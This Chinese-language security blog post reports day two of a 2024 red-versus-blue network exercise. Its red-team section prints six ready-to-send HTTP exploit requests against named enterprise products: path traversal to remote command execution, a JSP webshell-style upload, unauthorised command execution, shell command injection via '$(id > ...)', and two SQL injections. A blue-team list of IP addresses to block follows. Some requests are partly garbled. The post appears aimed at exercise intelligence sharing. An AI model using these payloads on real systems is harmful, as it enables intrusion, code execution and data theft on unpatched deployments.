HWday2-HVV四贱客陆续登场:帆xx、xx微、xx远、xx友
原创:病毒獵手 童杭波
竹枝词二首·其一
宋·黄庭坚
浮云一百八盘萦,落日四十八渡明。
鬼门关外莫言远,四海一家皆弟兄。
一、红队攻击
1.红队漏洞情况
【演练实时消息】
【消息时间】2024-07-24
【消息标题】:XX凌EKP存在sys_ui_component远程命令执行漏洞
【消息详情】:
POST/sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1
Host:xx.xx.xx.xx
Accept:application/json, text/javascript, /; q=0.01
Accept-Encoding:gzip, deflate
Accept-Language:zh-CN,zh;q=0.9,en;q=0.8
Connection:close
Content-Length:401
Content-Type:multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X xxx)AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15X-Requested-With: XMLHttpRequest
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition:form-data; name=“method”
replaceExtend------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition:form-data; name=“extendId”
…/…/…/…/resource/help/km/review/
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition:form-data; name=“folderName”
…/…/…/ekp/sys/common------WebKitFormBoundaryL7ILSpOdIhIIvL51–
/resource/help/kms/knowledge/dataxml.jsp
【演练实时消息】
【消息时间】:2024-07-24
【消息标题】:润XX报表dataSphereServlet 任意文件上传漏洞
【消息详情】:PosT /servlet/dataSphereServlet?action=38 HTTP/1.1
Host:127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept:/
Connection: close
Content-Length: 397
Content-Type: multipart/form-data;boundary=eac629ee4641cb0fe10596fba5e0c5d9
–eac629ee4641cb0fe10596fba5e0c5d9
Content-Disposition: form-data; name=“openGrpxFile”; filename=“539634.jsp”
Content-Type: text/plain
<% out.println(“873227518”); %>
–eac629ee4641cb0fe10596fba5e0c5d9
Content-Disposition:
form-data;
name=“path”
–eac629ee4641cb0fe10596fba5e0c5d9
Content-Disposition: form-data; name=“saveServer”
1
-eac629ee4641cb0fe10596fba5e0c5d9-
【演练实时消息】
【消息时间】2024-07-24:
【消息标题】:帆XX未授权命令执行
【消息详情】:
GET /webroot/decision/view/ReportServer?test=ssssssssssssSSSSsssssSSsssSSssS!
host:xxxx
connection: close
content-type:application/x-www-form-urlencoded
x-forwarded-for:xxxx
accept-encoding: gzip, deflate
user-agent: python-requests/2.31.o
accept:/
/webroot/aaa.jsp
【演练实时消息】
【消息时间】:2024-07-24
【消息标题】:XXX视综合安防管理平台 前台RCE
【消息详情】:
POST /center/api/installation/detection HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/105.0.1249.139 Safari/537.36
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json;charset=UTF-8
{“type”:“environment”,“operate”:“”,“machines”:{“id”: “$(id > /opt/hikvision/web/components/tomcat85linux64.1/webapps/vms/static/echo.txt)”}}
【演练实时消息】
【消息时间】:2024-07-24
【消息标题】:亿XX数据泄露防护(DLP)系统 NetSecConfigAjax SQL注入
【消息详情】:
POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
command=updateNetSec&state=123’;if(selectIS_SRVROLEMEMBER(‘sysadmin’))=1 WAITFOR DELAY ‘0:0:5’–
【演练实时消息】
【消息时间】:2024-07-24
【消息标题】:指挥调度管理平台 ajax_users.php SQL 注入漏洞
【消息详情】:
POST /app/ext/ajax_users.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0info
Content-Type:
application/x-www-form-urlencoded dep_level=1’)UNION ALL
SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
二、蓝队防守
1.蓝队封禁IP列表
115.223.23.169
182.92.101.38
39.105.59.253
117.80.146.225
113.2.165.197
103.42.181.141
119.179.253.223
103.68.195.70
36.134.153.49
123.56.123.115
123.57.137.73
112.25.79.66
223.15.243.43
47.103.57.73
106.124.140.167
113.219.243.90
三、 笑话
网安西格玛男人,互联网大厂高管的高富帅!
四、公众号
团队成立于2016年,WIS-HUNTER(中文全称智慧网络病毒猎手),拥有最全的信息安全服务内容;具备强大的安全研究团队,公司下辖多个实验室,其中杀手锏攻防实验室拥有大批漏洞发掘和分析人员,是独立发掘CVE和CNVD漏洞数量的团队;拥有覆盖8*N人的专业安全服务团队。
团队理念:
【理念】
以小博大,技术是杀手锏。
【文化】
1.明白人:知其然,知其所以然!不要迷惑于表象而要洞察事务的本质,要有文盲学习知识的心态,有时我们的学历,是我们学习过程中 最大的障碍。
2.出品人:本人出品,必属上品!有自我荣誉意识、追求卓越意识。乔布斯:人这辈子没法做太多事情,所以每一件都要做到精彩绝伦。
版权归原作者 WIS-HUNTER-战国云安全实验室 所有, 如有侵权,请联系我们删除。